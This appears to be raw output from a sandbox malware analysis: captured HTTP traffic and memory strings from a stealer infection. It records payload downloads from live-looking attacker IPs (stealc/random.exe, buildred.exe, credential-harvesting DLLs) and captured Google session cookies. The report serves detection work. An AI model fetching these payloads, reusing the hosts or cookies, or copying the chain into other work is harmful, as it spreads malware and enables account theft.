Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722614268&P2=404&P3=2&P4=aDBJmBRiu4bBgG0d5CtBgiCyasWY4s3e85vX9uilaJ5ZoJGUCP2ypk%2bTuDQrDjSoZ5e0N2ocgIZWMEShUpNIng%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 1nTulnp8J4hLpQqiZr1rmMSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /_/bscframe HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
Source: global traffic HTTP traffic detected: GET /generate_204?2GXXiw HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
Source: global traffic HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/gen204/?tmambps=0.00006616961789375582&rtembps=-1&rttms=82&ct=undefined HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=eLtuQCG4EKOUiy_WkIWBEoarZIHSwG7qGlWLFpSQnVFe8D_MZ9msw9JLMJwj8x708HeKW6qgHSTPUcFjpzJ8ZYyqvyV3spkA26VZGF4EVJPCbE-E1tXgy8VtJWXjgpQJTmQfV6E2tDYD3sQA5CvGeAKYlXOoJRi2UpDnhZW-H8M
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://connect.facebook.net/*/sdk.js*""*://*.imgur.io/js/vendor.*.bundle.js""*://auth.9c9media.ca/auth/main.js""https://smartblock.firefox.etp/play.svg""*://static.adsafeprotected.com/iasPET.1.js""*://adservex.media.net/videoAds.js*""*://*.moatads.com/*/moatapi.js*""*://static.chartbeat.com/js/chartbeat.js""*://connect.facebook.net/*/all.js*""*://*.moatads.com/*/moatheader.js*""*://www.rva311.com/static/js/main.*.chunk.js""*://cdn.optimizely.com/public/*.js""*://*.vidible.tv/*/vidible-min.js*""*://www.google-analytics.com/gtm/js*""*://c.amazon-adsystem.com/aax2/apstag.js""*://www.googletagservices.com/tag/js/gpt.js*""*://www.google-analytics.com/analytics.js*""*://imasdk.googleapis.com/js/sdkloader/ima3.js""*://cdn.adsafeprotected.com/iasPET.1.js""*://www.googletagmanager.com/gtm.js*""*://libs.coremetrics.com/eluminate.js""*://js.maxmind.com/js/apis/geoip2/*/geoip2.js""*://s.webtrends.com/js/advancedLinkTracking.js""*://static.chartbeat.com/js/chartbeat_video.js""*://*.imgur.com/js/vendor.*.bundle.js""*://s0.2mdn.net/instream/html5/ima3.js""*://www.google-analytics.com/plugins/ua/ec.js""*://www.everestjs.net/static/st.v3.js*""*://cdn.branch.io/branch-latest.min.js*""*://ssl.google-analytics.com/ga.js""*://pub.doubleverify.com/signals/pub.js*""*://static.criteo.net/js/ld/publishertag.js""*://*.adsafeprotected.com/jload?*""*://s.webtrends.com/js/webtrends.js""*://track.adform.net/Serving/TrackPoint/*""*://pubads.g.doubleclick.net/gampad/*ad*""*://*.adsafeprotected.com/*.js*""https://ads.stickyadstv.com/firefox-etp""*://*.adsafeprotected.com/*/Serving/*""*://pubads.g.doubleclick.net/gampad/*ad-blk*""*://*.adsafeprotected.com/jsvid?*""*://*.adsafeprotected.com/tpl?*""*://s.webtrends.com/js/webtrends.min.js""*://pixel.advertising.com/firefox-etp""*://pubads.g.doubleclick.net/gampad/*ad-blk*""*://vast.adsafeprotected.com/vast*""*://securepubads.g.doubleclick.net/gampad/*ad*""*://vast.adsafeprotected.com/vast*""*://www.facebook.com/platform/impression.php*""*://pubads.g.doubleclick.net/gampad/*ad*""*://securepubads.g.doubleclick.net/gampad/*ad*""*://*.adsafeprotected.com/*.png*""*://ads.stickyadstv.com/auto-user-sync*""*://pixel.advertising.com/firefox-etp""*://*.adsafeprotected.com/*/imp/*""*://*.adsafeprotected.com/*/unit/*""*://ads.stickyadstv.com/user-matching*""*://*.adsafeprotected.com/*.gif*""*://*.adsafeprotected.com/jsvid""*://*.adsafeprotected.com/services/pub*""*://track.adform.net/Serving/TrackPoint/*""*://www.facebook.com/platform/impression.php*""*://*.adsafeprotected.com/jload""*://*.adsafeprotected.com/*/adj*""*://*.adsafeprotected.com/*/adj*""*://*.adsafeprotected.com/*.gif*""*://ads.stickyadstv.com/auto-user-sync*""https://ads.stickyadstv.com/firefox-etp""*://*.adsafeprotected.com/*.png*""*://*.adsafeprotected.com/*/unit/*""*://ads.stickyadstv.com/user-matching*""*://*.adsafeprotected.com/*/Serving/*""*://*.adsafeprotected.com/jload""*://*.adsafeprotected.com/jload?*""*://*.adsafeprotected.com/*.js*""*://*.adsafeprotected.com/jsvid""*://
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*""https://www.amazon.com/exec/obidos/external-search/*""*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*""*://id.rambler.ru/rambler-id-helper/auth_events.js""*://media.richrelevance.com/rrserver/js/1.2/p13n.js"FTP support was removed from Firefox in bug 1574475Please use $(ref:SecurityInfo.overridableErrorCategory)."*://pagead2.googlesyndication.com/tag/js/gpt.js*"An unexpected property was found in the WebExtension manifest."*://track.adform.net/serving/scripts/trackpoint/" equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539250000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]qN"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountt-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]qQ"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"t-]q equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]qxID: 5652, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]qxID: 7092, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]q{ID: 7440, Name: firefox.exe, CommandLine: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2719579662.000001E53ADCB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2766918700.000001E53ADCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: '98p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://web-assets.toggl.com/app/assets/scripts/*.jswebcompat-reporter%40mozilla.org:1.5.1*://connect.facebook.net/*/sdk.js*resource://gre/modules/FileUtils.sys.mjs*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js**://static.chartbeat.com/js/chartbeat.js*://cdn.branch.io/branch-latest.min.js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://ssl.google-analytics.com/ga.js@mozilla.org/addons/addon-manager-startup;1*://www.google-analytics.com/analytics.js*resource://gre/modules/addons/XPIProvider.jsm*://s0.2mdn.net/instream/html5/ima3.js*://libs.coremetrics.com/eluminate.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://*.imgur.com/js/vendor.*.bundle.js*://www.google-analytics.com/gtm/js**://www.googletagservices.com/tag/js/gpt.js**://*.imgur.io/js/vendor.*.bundle.jsFileUtils_closeSafeFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/play.svg*://static.chartbeat.com/js/chartbeat_video.js*://track.adform.net/serving/scripts/trackpoint/https://smartblock.firefox.etp/facebook.svg*://www.everestjs.net/static/st.v3.js**://pub.doubleverify.com/signals/pub.js*FileUtils_closeAtomicFileOutputStream*://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.jsFX_SESSION_RESTORE_ALL_FILES_CORRUPT equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2878323682.0000026181BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2927921411.0000026194B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2888379941.000002618F03A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows"" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla 